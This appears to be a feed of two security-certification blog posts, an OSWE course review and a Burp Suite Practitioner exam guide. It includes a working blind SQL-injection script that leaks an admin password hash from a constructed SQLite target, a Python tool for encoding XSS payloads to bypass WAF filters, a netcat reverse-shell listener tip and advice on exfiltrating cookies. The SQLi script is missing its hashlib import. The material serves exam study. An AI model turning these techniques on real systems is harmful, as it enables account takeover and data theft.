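import sqlite3
from typing import Callable

# Constructed stand-in for the target: an in-memory SQLite "application" whose
# login handler concatenates the username into the query. Not a real application.
SECRET_HASH = hashlib.sha256(b"correct horse battery staple").hexdigest()


def build_app() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    db.execute("INSERT INTO users (username, password_hash) VALUES (?, ?)", ("admin", SECRET_HASH))
    return db


def vulnerable_login(db: sqlite3.Connection, username: str) -> bool:
    """Deliberately unsafe: attacker-controlled input inside the SQL string."""
    query = f"SELECT id FROM users WHERE username = '{username}'"
    return db.execute(query).fetchone() is not None


def safe_login(db: sqlite3.Connection, username: str) -> bool:
    """Hardened form: the same query with a bound parameter."""
    return db.execute("SELECT id FROM users WHERE username = ?", (username,)).fetchone() is not None


# Attacker side. An oracle answers one yes/no question about the database.
Oracle = Callable[[str], bool]


def make_inprocess_oracle(db: sqlite3.Connection) -> Oracle:
    # Break out of the string literal, AND in our condition, comment out the rest.
    # Against a live target this is where the HTTP request would be sent instead.
    return lambda condition: vulnerable_login(db, f"admin' AND ({condition})--")


def _leak_int(oracle: Oracle, expr: str, hi: int) -> int:
    """Binary search for the integer value of a SQL expression in [0, hi]
    using only 'expr > N' questions: about log2(hi) requests per value."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_length(oracle: Oracle, subquery: str, max_len: int = 256) -> int:
    return _leak_int(oracle, f"length(({subquery}))", max_len)


def extract_string(oracle: Oracle, subquery: str) -> str:
    """Leak the result of a scalar subquery one character at a time."""
    length = extract_length(oracle, subquery)
    chars = []
    for pos in range(1, length + 1):
        # unicode()/substr() are SQLite; use ASCII()/SUBSTRING() on MySQL,
        # ascii()/substr() on PostgreSQL.
        code = _leak_int(oracle, f"unicode(substr(({subquery}), {pos}, 1))", 127)
        chars.append(chr(code))
    return "".join(chars)


def exploit(db: sqlite3.Connection) -> str:
    """The one-shot attack: returns the admin's password hash."""
    oracle = make_inprocess_oracle(db)
    return extract_string(oracle, "SELECT password_hash FROM users WHERE username = 'admin'")


if __name__ == "__main__":
    app = build_app()
    leaked = exploit(app)
    print(f"leaked hash: {leaked}")
    print(f"matches seeded hash: {leaked == SECRET_HASH}")
```

Each leaked character costs about seven requests, so a 64-character hash is roughly 450 requests; if the target rate-limits or the time-based variant is needed, that count is what decides whether the approach fits in the exam clock.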

Potential Remote Command/Code Execution

  • Code Injection (Eval – Node.js)
  • Deserialization Bugs (Java, .NET)
  • SSTI
  • Unrestricted File Upload

Hail Mary

  • User Defined Functions
  • 3rd Party Frameworks & Libraries
  • APIs
  • Client Side Attacks
  • Reversing Authentication
  • Brute Forcing Tokens
  • JSP Web Shells

Useful Bookmarks

All the blogs that I used to study. Shoutout to all the authors! Thank you.

Discord Server – https://discord.gg/EDsJkzz8tG

AWAE Hindsight

  • Offensive Security provides you with everything you need to pass the exam, but you will also learn new things during the exam
  • I didn’t feel the pain folks were experiencing with latency. I did not touch their Kali instance
  • Be ready to be rattled. Things aren’t in the regular places, are named differently, and paths are different. During the exam do not underestimate how much this can freak you out. Basic Terminal/PowerShell system administration knowledge is your friend: grep, find, writing regular expressions and locating processes
  • Writing the POCs takes the most time since you need to script the entire exploit in one shot. Even with a developer background this took the most time. If Python is your language of choice, be sure to know requests inside and out, and in particular the Session object!
  • Set up local or remote debugging for each lab machine and script the entire exploitation in one shot. This means in one terminal nc -nvlp <port>, in another python main.py 192.168.1.1, and you receive a shell
  • Go through all the modules, and where Offensive Security says, “after some time we zeroed in on this class”, actually go through the entire result set and try to analyze it as if you didn’t know which class contained the vulnerability. In the course it’s easy to say, “Oh, they only had 40 results, I would have been able to filter through those”; it is a different story when it’s time to actually do that

Conclusion

As long as I’m more knowledgeable than I was prior to starting the course, I had a good time and a positive experience. No course is perfect so I don’t nitpick. Some things exceeded my expectations, some didn’t. I would recommend the course since you can’t find any competing courses with the same focus. Thank you Offensive Security.

What’s Next

  • Windows Kernel Programming by the awesome Pavel Yosifovich. I purchased this and really liked it but got caught up. I’m going to finish it this time!
  • SANS 642, London, December 2020 😛 Shoutout to my boss! He kept a SANS voucher for me on ice which I graciously used the day after submitting my OSWE report #whatbreak
  • I am waiting until the new Offensive Security exploit development course comes out in early 2021. I’m more interested in that than the PEN-300 they just dropped.

The post OSWE Review (AWAE Course) appeared first on Certification Chronicles.

Mastering Burp Suite: A Journey to Certification and Beyond

28 October 2023 at 23:06


Greetings, everyone! I’m back with the grandest of brooms, ready to sweep away three years’ worth of dust that has gathered on this aging blog. Over this time, my life has seen significant changes, both personally and professionally. The most remarkable of these has been embracing the title of girl-dad, an experience that has transformed my life in ways I never imagined. As outlandish as some of the rumors may be, I’m here to set the record straight by confirming that the answer to the top three questions people have been asking me is emphatically ‘NO’:

  1. Did I vanish into a cosmic abyss?
  2. Did I unearth and capitalize on a zero-day exploit, catapulting me into the elite 1%?
  3. Did I amass a fortune in Bitcoin and bask in retirement on the pristine shores of the Cayman Islands?

The purpose of this post is threefold:

  1. To share my personal journey through the Burp Suite Practitioner Certification, offering insights into the challenges and victories I encountered along the way.
  2. To provide valuable resources and tips that were instrumental in my certification journey, aiding others in their quest to pass the exam on their first attempt.
  3. To inspire and encourage fellow cybersecurity enthusiasts to embark on their certification journeys, highlighting the value of accessible labs and the wealth of resources available from trusted authorities in the field.

If you’re already well-prepared, have completed the labs, and are seeking last-minute exam tips, feel free to skip ahead.

Unwrapping the Burp Suite Practitioner Certification

The Burp Suite Certified Practitioner (BSCP) certification, offered by PortSwigger, the creators of Burp Suite, marks a significant milestone in a web security career. It demonstrates the ability to identify vulnerabilities, bypass defense mechanisms, and exploit them using Burp Suite. While some lab material delves into extreme depth, PortSwigger’s well-structured learning path and excellent course materials make most topics accessible and engaging. A detailed lab breakdown can be found in the appendix here.

Investing Wisely: Navigating the Cost of Certification

The BSCP exam costs just $99, which may surprise some. This affordability challenges our expectations, especially in a world accustomed to $1,500 courses and expiring lab subscriptions. It’s a psychological shift, and while it might seem cheap, remember that you’ll also need a Burp Suite Professional license, which is mandatory for the exam and currently priced at $449.

Juggling Parenthood and Certification Preparation

The path to certification requires unwavering consistency and willpower. I personally stopped and started my journey multiple times over two years. Acknowledging my lackluster focus, I decided to reset my lab progress in July and start from scratch. As of October 26, 2023, I’ve solved over 200 labs, covering Apprentice and Practitioner levels. The difference this time? I took notes diligently. A valuable lesson: embrace discipline and take notes alongside your hacking journey.

Exam readiness - check!

Cracking the Books: A Deep Dive into the Study Process

I embarked on my journey using Obsidian and Burp, with the ambitious goal of completing an entire topic per day (26 in total). My commitment was to ensure that I never went a day without at least completing some labs or reading material. The key to my success was not overlooking foundational topics. I’ve learned that reinforcing the basics keeps me receptive and offers fresh perspectives.

Decoding the Essentials: A Closer Look at Course Topics

PortSwigger’s material stands in the top tier of web application vulnerability resources. It’s free, which is a game-changer: no more scouring the internet and deploying vulnerable apps with no guidance. The labs are a gift, especially if you’ve experienced the frustration of unresolved vulnerabilities and endless PHP exceptions. While some topics may be challenging at first, the satisfaction of grasping something new is unmatched.

Navigating Your Web Application Security Certification Choices

When it comes to web application security certifications, choosing the right path can be a daunting task. The decision should be based on your existing knowledge, career goals, and the level of expertise you wish to achieve. Remember, there’s no one-size-fits-all choice in this journey.

OSWA (OffSec Web Assessor):

  • OSWA claims the top spot due to its foundational and accessible nature, making it an ideal starting point for beginners. This certification provides an essential understanding of web application security, laying a solid groundwork for more advanced certifications. It’s perfect for those new to the field and seeking to build a strong knowledge base.

BSCP (Burp Suite Certified Practitioner):

  • BSCP earns the second place in the ranking for its specific focus on Burp Suite, the most popular web vulnerability scanner and security tool. This certification is valuable for individuals looking to master Burp Suite and enhance their web security assessment skills. It’s a practical choice for those who wish to specialize in this tool and its applications.

eWPTX (eLearnSecurity Web Application Penetration Tester eXtreme):

  • eWPTX secures the third position, offering a comprehensive and in-depth exploration of web application penetration testing. It’s an excellent choice for web security professionals looking to elevate their expertise and gain advanced skills in this domain. eWPTX provides hands-on experience and practical scenarios, making it a valuable certification for those aiming to take their career to the next level.

OSWE (Offensive Security Web Expert):

  • OSWE occupies the fourth rank, signifying its advanced and specialized focus on web application security. This certification is tailored for professionals seeking mastery in advanced web security assessment techniques and defense mechanisms. It’s ideal for those who have already built a strong foundation in web application security and are prepared for the challenges of in-depth expertise in the field.

The Path to Success: Navigating the Exam Journey

To register for the exam, you must complete at least one Practitioner-level lab from each topic, five mystery labs, and one practice exam. Mystery labs challenge you to identify vulnerabilities without being told the objective. During the exam, you’ll need to compromise two applications within a four-hour window, moving from an unauthenticated visitor to a logged-in user, then to an administrator, and finally gaining remote code execution (RCE) or equivalent server-side access to retrieve a secret file. The logistics are straightforward, but be prepared to start the exam from a Windows machine, even though you can complete it on your Kali box. You can read the official instructions here.

Acing the Exam: Strategies for Passing on Your First Attempt

First and foremost, dismiss the notion that you have to fail on your first try. The sentiment that you should prepare to fail on the first attempt is pervasive but not necessary.

Understanding Exam Dynamics:

  • Mastery of the exam dynamics is crucial: understanding the rules for completing each application guides you through discrete steps.
  • This knowledge is a significant advantage, allowing you to isolate specific topics for different phases of the exam.
  • For instance, you’re unlikely to encounter SQL injection or command injection when attempting to gain initial access; instead, client-side attacks to access a user’s session are more common.
  • Credit to @botesjuan who I believe is the original creator of the commonly shared image below
    Exploit breakdown per exam phase

Master Client-Side Delivery With The Exploit Server:

  • Effective use of the exploit server is paramount to your success. Even if you’re highly experienced, doing only the bare minimum required to register for the exam often leads to failure.
  • Relying solely on one Practitioner lab per topic doesn’t adequately prepare you for the exam’s mechanics.

Weaponize Your Client-Side Payloads

  • Don’t treat a bare alert() as the ultimate solution in the labs; it’s insufficient in the exam. Instead, understand in each instance how you can exfiltrate cookies through your Collaborator or exploit server.
  • In many labs you’ll achieve this using an iframe, but be prepared for unexpected challenges. For example, some vulnerable pages may send an X-Frame-Options header (or a Content-Security-Policy frame-ancestors directive) that blocks framing, so keep a delivery variant ready that does not depend on an iframe.

Complete All Practitioner Labs:

  • Completing all Practitioner-level labs is essential, primarily for the sake of familiarity. The exam follows a similar structure to the labs, making your experience invaluable.
  • With enough practice, you’ll develop an intuitive sense and a mental checklist of potential vulnerabilities to look for.

Utilize Common Obfuscation and Encoding Techniques:

  • While the labs may not require you to bypass web application firewalls (WAFs), the exam certainly does. Don’t underestimate the importance of obfuscation and encoding techniques.
  • Falling short in this area during the exam can lead to pitfalls, so be well-prepared.
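
An added example, not code from the original post or from PortSwigger’s material: a small Python helper that produces the common encoded forms of one payload so you can try them quickly when a filter blocks the plain version. The point the section makes, and the part most people get wrong under time pressure, is that each encoding only works in the context that decodes it (HTML entities in attribute values, \u escapes inside a JS string, percent-encoding wherever the server decodes), so each variant is keyed by that context. The sample payload is constructed.

```python
import base64
from urllib.parse import quote


def url_encode(payload: str) -> str:
    """Percent-encode every non-alphanumeric byte. Decoded once by the server
    (or by the browser when the payload travels in a URL)."""
    return quote(payload, safe="")


def double_url_encode(payload: str) -> str:
    """Survives a WAF that decodes only once when the backend decodes again."""
    return quote(url_encode(payload), safe="")


def html_decimal(payload: str) -> str:
    """Numeric entities; decoded by the HTML parser inside attribute values
    (e.g. onclick="...") but NOT inside <script> blocks."""
    return "".join(f"&#{ord(c)};" for c in payload)


def html_hex(payload: str) -> str:
    """Same as html_decimal with hexadecimal entity values."""
    return "".join(f"&#x{ord(c):x};" for c in payload)


def js_unicode(payload: str) -> str:
    """\\uXXXX escapes; decoded by the JavaScript parser inside a JS string literal."""
    return "".join(f"\\u{ord(c):04x}" for c in payload)


def js_from_char_code(payload: str) -> str:
    """Builds the string at runtime so no quotes or keywords appear in the source."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in payload) + ")"


def js_eval_atob(payload: str) -> str:
    """Base64 hides everything from keyword filters; needs an eval sink."""
    b64 = base64.b64encode(payload.encode()).decode()
    return f"eval(atob('{b64}'))"


def mixed_case(payload: str) -> str:
    """Alternate letter case; HTML tag and attribute names are case-insensitive,
    so <ScRiPt> still runs while a case-sensitive blocklist misses it."""
    return "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(payload))


def variants(payload: str) -> dict:
    """All encodings of one payload, keyed by the context that decodes them."""
    return {
        "url (server decodes once)": url_encode(payload),
        "double url (server decodes twice)": double_url_encode(payload),
        "html decimal entity (attribute value)": html_decimal(payload),
        "html hex entity (attribute value)": html_hex(payload),
        "js unicode escape (JS string literal)": js_unicode(payload),
        "js fromCharCode (any JS context)": js_from_char_code(payload),
        "js eval(atob()) (eval sink)": js_eval_atob(payload),
        "mixed case (HTML tag/attribute names)": mixed_case(payload),
    }


if __name__ == "__main__":
    # Constructed sample payload; in the exam this would be your exfiltration payload.
    for context, encoded in variants("<script>alert(1)</script>").items():
        print(f"{context:40} {encoded}")
```

Run it with the payload you intend to deliver and paste the variant whose context matches the injection point; if none lands, combine them (for example, entity-encode a payload that itself uses String.fromCharCode) rather than stacking the same encoding twice.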

Compile Proof-of-Concept (POC) Code:

  • It’s a recipe for disaster to rely solely on grabbing solutions from the lab materials during the exam, especially when you have only about 40 minutes per vulnerability (four hours, two applications, three stages each).
  • Ensure you have POC code readily available for each potential vulnerability you may encounter.

Perform Targeted Scanning, Don’t Rely On It

  • While targeted scanning is a valuable skill, it’s unwise to depend solely on it to solve the exam. Being able to actively scan the webroot and have that resolve the exam isn’t guaranteed.
  • Consider learning targeted scanning as an additional tool in your toolkit; it may prove useful in certain scenarios.

Value PortSwigger’s Hints:

  • Don’t overlook the hints provided by PortSwigger themselves. These hints can provide critical guidance and insights, potentially making your exam experience smoother and more successful.

Rich Resources: Your Ultimate Toolkit

A big shout-out to the authors of the following content, which proved immensely valuable during my journey. If you aim to pass the exam on your first attempt, bookmark these resources and know them inside and out.

Unlocking Wisdom: Blogs for your Journey

  1. https://github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study
  2. https://github.com/DingyShark/BurpSuiteCertifiedPractitioner
  3. https://github.com/Zoltan3422/portswigger-guide
  4. https://micahvandeusen.com/burp-suite-certified-practitioner-exam-review/
  5. https://bscpcheatsheet.gitbook.io/exam/
  6. https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/
  7. https://sc.scomurr.com/http-request-smuggling-web-cache-poisoning/

YouTube Guides: Navigating the World of Burp Suite

  1. https://www.youtube.com/@RanaKhalil101/videos
  2. https://www.youtube.com/@intigriti/videos
  3. https://www.youtube.com/watch?v=yC0F05oggTE
  4. https://www.youtube.com/@z3nsh3ll

Burp Plugin Power: Enhancing Your Toolkit:

  1. DOM Invader
  2. Param Miner
  3. Hackvertor
  4. Deserialization Scanner
  5. HTTP Request Smuggler

The Final Verdict on the Burp Suite Practitioner Certification

Through this incredible journey, I’ve ventured into unfamiliar territories while strengthening my knowledge in familiar ones. The accessible labs have proven invaluable, offering a wealth of resources to all, even those who might not be interested in certification.

I want to underscore that if I can persevere through this certification journey with a newborn by my side, anyone with the motivation, focus, and determination can do it too. This certification offers a path to expertise in web security, a field where knowledge is power. So, dive in, make use of the resources I’ve shared, and indulge in your favorite topics. The journey is challenging, but the destination is worth every effort. Until next time, stay inspired and stay secure.

Appendix

My Favorite Topics

  • Prototype Pollution
  • HTTP Request Smuggling
  • Race Conditions

Lab Breakdown

Number of labs per topic at each level:

Topic                 Apprentice  Practitioner  Expert
SQLi                           2            16       0
XSS                            9            15       6
CSRF                           1            11       0
Clickjacking                   3             2       0
DOM-Based                      0             5       2
CORS                           2             1       1
XXE                            2             5       1
SSRF                           2             3       2
Request Smuggling              0            15       7
Command Injection              1             4       0
SSTI                           0             5       2
Path Traversal                 1             5       0
Access Control                 9             4       0
Authentication                 3             9       2
WebSockets                     1             2       0
Cache Poisoning                0             9       4
Deserialization                1             5       3
Info Disclosure                4             1       0
Business Logic                 4             7       0
Host Header                    2             4       1
OAuth                          1             4       1
File Upload                    2             4       1
JWT                            2             4       2
Prototype Pollution            0             9       1
GraphQL                        1             4       0
Race Conditions                1             4       1
NoSQL                          2             2       0

The post Mastering Burp Suite: A Journey to Certification and Beyond appeared first on Certification Chronicles.
